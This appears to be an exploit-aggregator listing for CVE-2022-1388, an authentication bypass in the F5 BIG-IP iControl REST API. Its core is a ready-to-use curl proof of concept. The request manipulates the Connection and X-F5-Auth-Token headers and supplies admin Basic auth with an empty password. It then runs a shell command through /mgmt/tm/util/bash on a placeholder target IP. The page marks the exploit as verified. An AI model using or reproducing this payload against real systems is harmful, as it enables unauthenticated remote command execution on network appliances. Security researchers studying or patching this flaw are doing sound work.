Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager CVE-2022-1388

Name: Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager CVE-2022-1388
Rating: 5 (334 reviews)

2022-05-05 | CVSS 7.5

## https://sploitus.com/exploit?id=1B780B5D-F60A-5066-A44B-253EADDAC5CF
# CVE-2022-1388
BIG-IP iControl REST vulnerability CVE-2022-1388



# Usage 

* This POC is Verified!

![poc](https://github.com/numanturle/CVE-2022-1388/blob/main/rce.jpeg?raw=true)
![poc](https://github.com/numanturle/CVE-2022-1388/blob/main/pic.jpeg?raw=true)

```
curl -i -s -k -X $'POST' \
    -H $'Host: localhost' -H $'Connection: keep-alive, X-F5-Auth-Token' -H $'Authorization: Basic YWRtaW46' -H $'X-F5-Auth-Token: a' -H $'Content-Length: 39' \
    --data-binary $'{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}' \
    $'https://IP_HERE/mgmt/tm/util/bash'
 ```


# Reference 

https://twitter.com/1ZRR4H/status/1522150111429726209
https://twitter.com/AnnaViolet20/status/1523564632140509184